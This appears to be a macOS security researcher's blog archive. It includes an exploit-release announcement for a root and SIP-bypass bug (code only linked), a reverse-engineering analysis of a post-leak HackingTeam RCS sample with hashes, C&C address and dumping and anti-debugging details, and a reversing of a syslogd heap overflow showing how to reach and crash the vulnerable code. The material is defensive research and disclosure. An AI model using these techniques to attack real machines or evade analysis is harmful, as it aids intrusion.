SyScan360 Singapore 2016 slides and exploit code

The exploit for the bug I presented last March at SyScan360 is today one year old so I decided to release it. I wasn’t sure if I should do it or not since it can be used in the wild but Google Project Zero also released a working version so it doesn’t really make a difference.

I’m also publishing here the final version of the slides that differ slightly from the version made available at the corporate blog.

You can find the slides here and the PoC code at GitHub.

The exploit code is slight different from Ian Beer exploit so you probably might want to give it a look. It’s a pretty clean and neat exploit :-).

You can find Ian Beer’s blog post about this bug here. Bug collisions are not fun, I expected this bug to be alive for a lot longer but Ian Beer is awesome, so hat tip to him.

The bug itself is super fun since it allows you to exploit any SUID binary or entitlements, meaning you can escale privileges to root and then bypass SIP and load unsigned kernel extensions with the same bug. Essentially, massive pwnage with a single bug. The only thing missing is remote code execution. Ohhhhh :-(.

Every OS X version except El Capitan 10.11.4 is vulnerable so if you are running older systems you should consider upgrading asap (they are also vulnerable to other unpatched bugs anyway!).

Have fun,
fG!

The Italian morons are back! What are they up to this time?

Nothing 🙂

HackingTeam was deeply hacked in July 2015 and most of their data was spilled into public hands, including source code for all their sofware and also some 0day exploits. This was an epic hack that shown us their crap internal security but more important than that, their was of doing things and internal and external discussions, since using PGP was too much of an annoyance for these guys (Human biases are a royal pain in the ass, I know!). You can consult the email archives on this Wikileaks online and searchable archive. I had some love on those emails although they never sent that promised Playboy subscription (not interested anymore guys, they gave up on nudes!). For an epic presentation about their OS X RCS malware give a look at these slides.

Last Friday a new OS X RCS sample was sent to me (big thanks to @claud_xiao from Palo Alto Networks for the original discovery, and as usual to @noarfromspace for forwarding it to me). My expectations weren’t big since all the public samples were rather old and know we had their source code so if it were an old sample it was totally uninteresting to analyse. But contrary to my expectations there are some interesting details on this sample. So let’s start once more our reverse engineering journey…

The sample hashes are:

ZIP with dropper: 2ee9e9d9a0cd3cee6519e7b950821d5c90af03da665879615e52fd093dd8e947
Dropper binary: 58e4e4853c6cfbb43afd49e5238046596ee5b78eca439c7d76bd95a34115a273

Both files were submitted to VirusTotal three weeks ago.
zip_vt_submissiondropper_vt_submissionAnd their detection rate was (as mostly expected) zero.
vtInstallerAs I have written a couple of times, the first thing we should do is to look at the mach-o headers of the binary files. This can quickly gives us valuable information and save us some future time.
main_headerThe first thing one can notice on this binary is that extra segment called “_eh_frame”. This is not a normal segment although it is labeled as a section that can be usually found in mach-o binaries. HackingTeam used this same trick in the past so it’s a strong indicator we are analysing HackingTeam malware and that this could still be an old sample.
text_segmentNext trick is the fact that this binary is using Apple’s Binary protection, which we can observe on the flags trick using SG_PROTECTED_VERSION_1 flag. A good reference on this Apple feature is Amit Singh’s blog post. It’s pretty easy to dump and recover the original code so it’s not an obstacle to reverse engineering this sample, mostly to evade AV detection. Back in 2009 I wrote a blog post on how to manually dump these binaries or you can use “deprotect” from Classdump to automatically do it for you.
eh_frame_segmentThe injected segment is also protected with the same Apple feature and deprotect tool seems unable to deal with this fact. We can try to manually dump this segment. For this to happen we need to attach a debugger to the dropper binary, since the segment will only be decrypted when its memory pages are used. This is where we find one interesting trick from this sample :-).

Before we go there, a last screenshot from the binary headers. If we look at the entrypoint it points into the “_eh_frame” segment, which is also very unusual (VirusTotal flags this as suspicious). What happens is that the normal __TEXT segment is fake since it contains no code (look at the size, it occupies 4kb in memory). Same trick as older RCS samples.
entrypointI’m not a fan of lldb so I still use old Apple’s gdb. It works for me so why bother with the newer but awkard lldb?
The entrypoint is a good breakpoint so that’s where we start. When we run the dropper gdb gives us a weird error message.
gdb_outputGdb has hit a EXC_BAD_ACCESS exception at the entrypoint address, meaning that memory permissions are wrong. The segment is now decrypted (you can compare this code with the code you get if you try to disassemble the binary) and we can dump it with gdb itself or my readmem util. What we are unable to do is to step and debug the dropper binary. To dump using readmem just use “readmem -p PID -a 0x7000 -s 0xB9000”, with gdb “dump memory FILENAME 0x7000 0xC0000”. This will give you the full “_eh_frame” segment which you can then load into a disassembler. It’s not a mach-o binary so the disassembler will complain but you know where the entrypoint is so you can disassemble from there.
Anyway, let’s get into the interesting stuff. The gdb error quickly gave me an hint to look again at the mach-o headers. Let’s look at the “_eh_frame” segment header again…
eh_frame_segmentCan you spot anything special here?
Look at the VM memory protections. The maximum VM protection is set to Read and Writable, and the Initial VM protection to Read and Executable. If this code is executable the flags will need to be executable. What happens here is that the maximum VM protection is not executable and this is the reason why gdb is unable to access the memory. The fix is as simple as fixing the maximum protection to RWX (modify hex value to 8). That’s quite a nice anti-debugging trick I don’t remember every seeing before. Hat tip to you HackingTeam ;-).

Looking at the dropper code and comparing with older samples and we can’t spot many differences. The structure is more or less the same and the tricks still the same, so you can refer to my slides and older blog posts if you are interested in those details. The only difference is that this time the dropper only packs a single persistence binary and a configuration file. Older samples packed more stuff. In case you dumped the “_eh_frame” as I described, you can find the packed files at address/offset 0x22A4. At offset 0x22B7 we have the name of the persistency binary, “_9g4cBUb.psr“, and at 0x22D7 the folder name “8pHbqThW“. The folder where the dropper installed binaries is still the same as older samples, “~/Library/Preferences/“.
At offset 0x22F7 we have the size of the binary, 0xB5DF9, and at 0x22FB starts the persistency binary that will be installed by the dropper. At 0xB80F8 we can find the configuration file “Bs-V7qIU.cYL“. Has a size of 0x8F0 bytes (offset 0xB8138), and starts at offset 0xB813C. The configuration file as usual is encrypted.

Let’s recap what we have seen until now. The dropper is using more or less the same techniques as older HackingTeam RCS samples and its code is more or less the same. The new things we can observe is the binary using Apple’s binary protection feature and a small anti-debugging trick. Until now, nothing spectacular. Either this is an old sample or HackingTeam are still using the same code base as before the hack.

Next logical step is to look at the persistency binary we extracted from the “_eh_frame” segment. This is where the core of RCS is and should help us answer interesting questions, in particular how old is this sample. For me this was really what mattered with this sample. Once again, let’s look at its headers.
dropped_binary_headerRight now you are already a mach-o expert and noticed how simple this header is. It only contains two segments and one section. This is not normal, in particular when we expect HackingTeam persistency binary to be Objective-C code as in the past.
Loading this into a disassembler and we get only a tiny amount of code, the rest is what appears to be junk code. This is pretty much a tell tale that this binary is packed. This points straight way to HackingTeam’s own packer, keypress, that can be found in the leaked source code. The easiest way to validate this assumption is to compare the disassembly with the source code. The following piece of disassembly clearly identifies this as keypress.
keypress_packerFor legal reasons I’m not going to display the leaked source code but you can easily compare those strings and find them in the unpacker code. This is the first sample I have ever seen using their packer, which makes sense since the packer has a 2014 date and all known samples were older than that.
The packer has nothing special and you can even dump it using my readmem util (this time use the -m option to have it dump the full binary from memory). Just start the persistency binary in a vm and while it’s starting you can quickly start readmem and dump it. The alternative is to load it in gdb and find the original entrypoint and dump from there. It’s a bit of more work because gdb can’t activate breakpoints on this binary so you will need to manually patch int3 all over to get gdb to break. If you are using gdbinit you can use the int3/rint3 commands to automate this work.

With the persistency binary finally dumped we can answer relevant questions. What is the date of this sample?
The date question can be answered two ways, using the information from the configuration file (at this stage still encrypted) and from encoded version information.
The source code has a variable called gVersion that refers, more or less, to the sample data. From the source code leak we can find the latest value for this variable, 2015032101, on a commit from 9th April 2015. The gVersion value is a good approximation to the commit date and allows us to track the sample in time.

A bit of reverse engineering here and there and we can find this variable value for this sample, 0x781C294E, translating to 2015111502. BINGO! This locates this sample around October and November 2015, a super fresh RCS sample and post July hack. Never before we had such a fresh sample. And if this date is really true we have a post hack sample, meaning that HackingTeam are still alive and kicking post July hack.

The next step is to confirm this information using the configuration file. First we locate the configuration file encryption key and then decrypt it. There we can find the configuration dates for this sample, 2015-10-16, confirming that this is indeed a post hack sample. The C&C server IP for this sample is 212.71.254.212. It’s already down and I didn’t verified if it was up before starting to tweet about this sample on last Friday (honesly I don’t care much about the server side). Might have been up and was quickly brought down or was already down (or this is simply a demo but it doesn’t look like it).

The last question about this is to understand what happened to HackingTeam after the July hack. At the time they promised to release a new version that they were telling was not affected by the hack. Is this really true?
Well, if you start disassembling and comparing with the leaked source code you will see that this appears to be totally false. The sample is compiled out of the leaked source code base and I can’t see many new improvements. I can guarantee you that this sample code is coming from that code base, up to the last commit (there are probably newer commits after the leak). HackingTeam appears to have resumed their operations but they are still using their old source code for this. Of course there is a question of are they using both old and the new promised source code or were they just lying about it and resumed operations with old code since they are probably on a shortage of engineering “talent”? This is definitely a question their customers will have to ask them ;-).

Conclusions…

HackingTeam latest sample is a very fresh sample compared with what we got in the past, it is a sample created post July 2015 hack, and it’s using the same code base as before. HackingTeam is still alive and kicking but they are still the same crap morons as the email leaks have shown us.
If you are new to OS X malware reverse engineering it’s a nice sample to practice with. I got my main questions answered so for me there’s nothing else interesting about this. After the leak I totally forgot about these guys :-).

@noarfromspace made a good point that this sample could have been compiled by someone else other than HackingTeam since the source code is out. It is definitely an easier and not so sexier alternative path for this. My feeling is that while possible this is not the case. But never forget that Human biases can always lead us to the wrong path ;-).
For example, the gVersion variable appears to be manually updated on the source code repo (I can’t find any automated scripts for this) and follows the same pattern as previous versions. A definitive answer needs a bit more of reverse engineering time.

Some interesting network info provided by Charlie Eriksen tells us that the host was up at least in January and Shodan has a scan on the same day the sample was submitted to VirusTotal. References here and here.
Update: John Matherly just left some historical Shodan data. Shodan detected this host up as far as from 15 October 2015. The configuration file filters activation date start on the next day. Pretty good data out of Shodan 🙂

Looking at VirusTotal submission details we have the following:

  • The zip file was created on 2016-01-29 11:43:50UTC , and submitted to VirusTotal via the web interface on 2016-02-04 from Italy. Censys updated the C&C server info at 2016-01-18T19:21:09+00:00.
  • The dropper binary was submitted to VirusTotal twice on the 2016-02-04 from France via API.
  • The bundle binary that is also extracted in the target persistency folder was submitted the next day 2016-02-25 07:36:07UTC via the API from unknown country and from the installation folder /Users/user1/Library/Preferences/8pHbqThW/w1_X-Hye.gn6.

Update: I just found some unique code in this dropper. This code checks for newer OS X versions and does not exist in the leaked source code. Either someone is maintaining and updating HackingTeam code (why the hell would someone do that!?!?!) or this is indeed a legit sample compiled by HackingTeam themselves. Reusage and repurpose of malware source code happens (Zeus for example) but my gut feeling and indicators seem to not point in that direction.

Have fun,
fG!

P.S.: This might be a work in progress post and some new content might be added or fixed.

Reversing Apple’s syslogd bug

Two days ago El Capitan 10.11.3 was released together with security updates for Yosemite and Mavericks. The bulletin available here describes nine security issues, most of them related to kernel or IOKit drivers. The last security issue is about a memory corruption issue on syslog that could lead to arbitratry code execution with root privileges. I was quite curious about this bug mostly because it involved syslogd, a logging daemon.

This post is about reversing the vulnerability and finding how it could be exploited. Unfortunately for us Apple is very terse on its security updates – for example they say nothing about if it is exploitable on default OS X installations or requires particular conditions. As we will see later on, this bug is not exploitable on default OS X installations.

While Apple makes available the source code for many components used in OS X, most of the time there is a significant delay so we need to use binary diffing to find out the differences between the vulnerable and updated binary. The usual tool for this purpose is BinDiff but there is also a free alternative called Diaphora made by Joxean Koret. Both tools require IDA and on this post we are going to use Diaphora. For this purpose we will need a copy of the vulnerable and patched binaries. The easiest way is to copy the syslogd binary (found at /usr/sbin/syslogd) before the updates are installed (usually it’s a good idea to have virtual machines snapshots for each version) and then after (or just extract the new binary from the update packages – El Capitan, Yosemite, Mavericks). This post will focus on Yosemite binaries.

Diaphora essentially works by generating a database and then comparing its contents. Comparing the 10.11.2 and 10.11.3 syslogd binaries gets us the following warning from Diaphora:

identical_callgraph
This means that both binaries are very similar so we should expect minimal changes between the two. Only one change is detected and its output is below.

patch_diffThe change is quite subtle. The original code could be something like:

reallocf(pointer, value + 4);

And the patch something like:

reallocf(pointer, value * 4 + 4);

The syslogd source package for El Capitan 10.11.2 can be downloaded here. The easiest way to try to locate this function is to grep the code using the string “add_lockdown_session: realloc failed\n”, finding a single hit inside syslogd.tproj/dbserver.c. The source code for this function is: add_lockdown_session_codeThis makes it easier to observe the vulnerability. The patch is made on the reallocf() allocation size while the vulnerability is triggered when the fd variable is written into the lockdown_session_fds array. The allocation size used in reallocf() is wrong since it’s allocating memory just for the number of lockdown sessions instead of enough memory for each session. The following image taken from Zimperium’s analysis is a perfect illustration of the overflow and heap corruption.
Heap-overflow-out-of-bounds-write-because-of-invalid-size-calculation-during-reallocationAt the third connection the heap corruption is happening but from my tests more connections are required to make it crash (I get most of the time crashes in different areas than Zimperium but I was also testing against OS X).

The developer of this particular piece of code made a mistake, and the fix can be as simple as adding a set of parenthesis:

code_fix
C language is powerful but unforgiving of these small mistakes.

At this point we know where the vulnerability is and how it was patched. The next question is how do we reach this function? The following is the partial call graph for add_lockdown_session():

callgraph_add_lockdown_session
Judging by the initial function names the vulnerable function could be reached either locally (unix socket?) or remotely/locally (via TCP socket). The security bulletin mentions an attack from a local user. Looking at /System/Library/LaunchDaemons/com.apple.syslogd.plist configuration we can only observe the syslog unix socket:default_syslogd_socketsThis means that the default configuration in OS X is not vulnerable, unless the user changes it. Unfortunately for us Apple doesn’t mention this in the bulletin, which is indeed interesting information for example to anyone running old systems that can’t be upgraded.Let’s dig a bit deeper and understand what do we need to do to activate this feature in OS X so we can try to reproduce the vulnerability. The remote_acceptmsg_tcp() function seems like a good candidate to trace back. Looking it up on source code we will find an interesting function:remote_init_sourceThis is the function that will activate the remote feature which allows us to reach the vulnerable code. The #ifdef mean that we can check the binary to see if they were compiled or not into the final binary.remote_init
The disassembly output of remote_init() shows that only remote_init_tcp() was compiled, meaning that we can reach the vulnerable code via tcp sockets, either locally or remote depending on user configuration. The remote_init_tcp() function takes care of creating and binding the listener socket and is the one calling remote_acceptmsg_tcp() we saw in the first callgraph using Grand Central Dispatch.remote_init_tcp_sourceWe still don’t know how to activate the remote feature. Next step is to see who calls remote_init(). There are two calls but the most interesting is init_modules().init_modules_sourceThe remote module support will be compiled into syslogd binary if the target is not the iOS simulator and the default enable or disable status depends on the remote_enable local variable. Its default value is zero, meaning the remote feature is disabled by default. This is another strong clue about a default OS X not being vulnerable.
Finally init_modules() is called by main(), where we can find the final clues about how to activate this feature.main_sourceInside main we can observe interesting things and finally be sure if OS X is vulnerable on default installation or not. The first thing we can observe in the above code snippet is that the remote feature is enabled by default on the embedded OS, usually meaning iOS and AppleTV. Next there is an option “-config” that also enables it if the iphone option is selected. Last is the undocumented “-remote” command line option, which can enable the remote feature on any Apple operating system.

To activate the feature we need to edit syslogd launchd configuration file found at /System/Library/LaunchdDaemons/com.apple.syslogd.plist (usually in binary format but can be converted using “plutil -convert xml1 filename“). The ProgramArguments and Sockets keys need to be modified to the following:

launchd_configBecause launchd controls the sockets we also need to configure the socket where syslogd will be listening for the remote option (#define ASL_REMOTE_PORT 203).
After we modify the plist and reload syslogd we can finally connect to port 203.

telnet_asl_remote_exampleThe vulnerable code path is triggered using the watch command. If we attach a debugger and insert a breakpoint in the vulnerable add_lockdown_session(), the breakpoint will never be hit when we select the watch command. This is the code inside session that calls the vulnerable function:call_vulnerable_functionThe WATCH_LOCKDOWN_START is only set in one place inside session:set_watchdown_flagThe SESSION_FLAGS_LOCKDOWN is a flag passed on the only session argument.
And we can finally observe and conclude why the security bulletin talks about a local user:remote_acceptmsg_sourceThis means that the SESSION_FLAGS_LOCKDOWN flag is only set on local connections and never on remote tcp connections, the only feature we have enabled in OS X syslogd binary. The functions who call remote_acceptmsg() show it clearly.remote_acceptmsgs_sourceThe conclusion is that there is no code path to trigger this bug in OS X, even if the user configures the remote feature. To test the bug and observe it in action the only way is to attach to the syslogd binary (or patch it) and remove the above condition (we can also patch inside session but here is easier). Next we just need a small tcp client that sends a few connections to the port 203 and issues the watch command. Sooner or later the syslogd binary will finally crash.
The vulnerability also doesn’t seem easy to exploit because we don’t have much control over the fd variable that is overwriting the allocated array.

One final note is that the vulnerability was only patched in El Capitan but not included in Yosemite and Mavericks security updates. While we have just seen that even on El Capitan there is no code path to the vulnerable code it is weird that the older versions weren’t also patched. Apple security policy is still confusing most of the time.

So after a long post we can finally conclude that there is nothing really interesting about this vulnerability in OS X (and also iOS given the potential barriers to exploitation). It was just an interesting reverse engineering and source code analysis exercise to understand the vulnerability impact in OS X. This exercise wouldn’t be needed if Apple just published more relevant details on its security bulletin.

Thanks to pmsac for draft post review and exploitation discussion (also to qwertyoruiop and poupas).

Have fun,
fG!

P.S.: The tool used to generate the call graph is Understand from http://www.scitools.com. It’s a great tool for browsing and auditing large projects.

Gatekeerper – A kernel extension to mitigate Gatekeeper bypasses

Last month Patrick Wardle presented “Exposing Gatekeeper” at VB2015 Prague.
The core of the presentation deals with Gatekeeper bypasses originating in the fact that Gatekeeper only verifies the code signatures of the main binary and not of any linked libraries/frameworks/bundles.
This means it is possible to run unsigned code using dynamic library hijacking techniques also presented by Patrick in code that should be protected by Gatekeeper. His exploit uses an Apple code signed application that is vulnerable to dylib hijacking and his modified to run unsigned code when downloaded from the Internet. In this scenario Gatekeeper enters into action and should verify if the download is code signed (assuming the default OS X scenario where it is enabled). But in this case Gatekeeper will fail to verify the linked code and effectively is bypassed.

The core of the problem is that Gatekeeper only deals with the main binary code, and never verifies any linked code. This is obviously a flaw and hopefully a fix by Apple should be out sooner or later. Meanwhile we can try to build ourselves a fix using the TrustedBSD framework. For this I created Gatekeerper, a proof of concept kernel extension for Yosemite 10.10.5 (can be easily adapted to work with El Capitan, but I don’t want to release that code).
Continue reading

London and Asia EFI monsters tour!

Finally back home from China and Japan tour, so it’s time to finally release the updated slides about EFI Monsters. After Secuinside I updated them a bit, fixing stuff I wasn’t happy with and adding some new content.

The updated version was first presented at 44CON London. I had serious reservations about going to the UK (not even in transit!) but Steve Lord and Adrian charm convinced me to give it a try. 44CON was great and it’s definitely a must attend European conference. It has the perfect size to meet people and share ideas. I prefer single track conferences, dual track is the max I’m interested in. More than that it’s just too big, too messy, too many choices to be made regarding what to see.

A big thanks to everyone at 44CON who made it possible!

Next was SyScan360 in Beijing. It was the fourth time it happened, and my third time in a row. I do like very much to go there because even with language barriers you can feel what’s happening there. Bought a bunch of (cheap) hardware gear made by 360 Unicorn team. Their “usb condom” is super cheap and super small. Also bought a network tap and a USB to serial (don’t really needed it but it was damn cheap). The SyScan360 badge as usual was super fun, this time with a micro Arduino, Bluetooth and LED modules. Conference went pretty smooth and had lots of fun. They had a gigantic LED panel where slides were displayed at. That was some gigantic TV they had there 🙂

Big thanks to everyone involved in SyScan360 2015.

Last stop, was CODE BLUE happening in my current favorite city outside Portugal, aka Tokyo. Third time happening, my second in a row. Organization is top notch, everything goes smoothly. Congrats to Kana, El Kentaro, Tessy, and everyone else involved.
This year it had two tracks, and a lot more attendees. It’s definitely a conference to put on your calendar. The audience is super interested in learning. Japan is lagging behind in terms of security so they are keen to finally catch up.

Some people approached me and shown some interested about (U)EFI security. This is great, that was the goal of this presentation, to show people (U)EFI research isn’t that hard and that it is really important its issues start to be fixed. We need to start building trustable foundations and not try to solve everything in software on top of platforms we can’t really trust.

Last conference for the year is No cON Name happening in Barcelona next December.

For next year I already got something that hopefully I’ll be able to present at SyScan360 Singapore. Their CFP is open and you should definitely think about submitting.

There were minor changes between 44CON and SyScan360/Code Blue slides. The latter included more references than 44CON version and minor fixes.

Have fun,
fG!

Slides:
44Con 2015 – Efi Monsters.pdf
SyScan360 2015 – Efi Monsters.pdf
CodeBlue 2015 – Efi Monsters.pdf

Rootfool – a small tool to dynamically disable and enable SIP in El Capitan

El Capitan is finally released and System Integrity Protection aka SIP aka rootless is finally a reality we must face. Let me briefly describe SIP (technical details maybe in another post, now that El Capitan is final and out of NDAs). This post by Rich Trouton contains a very good description of its userland implementation and configuration.

What is SIP anyway?

The description that I like to use is that SIP is a giant system-wide sandbox, that controls access to what Apple considers critical files and folders. One of the reasons for this is that most of kernel side SIP implementation exists into the Sandbox.kext, the same TrustedBSD kernel extensions that implements OS X sandbox mechanism.

For example, if we try to write to /System folder we get the following result:

sh-3.2# touch /System/test
touch: /System/test: Operation not permitted

And in system logs:

12/10/15 17:27:20,650 sandboxd[120]: ([424]) touch(424) System Policy: deny file-write-create /System/test

In practice it means that even with root access we are unable to modify those critical files and folders.
Continue reading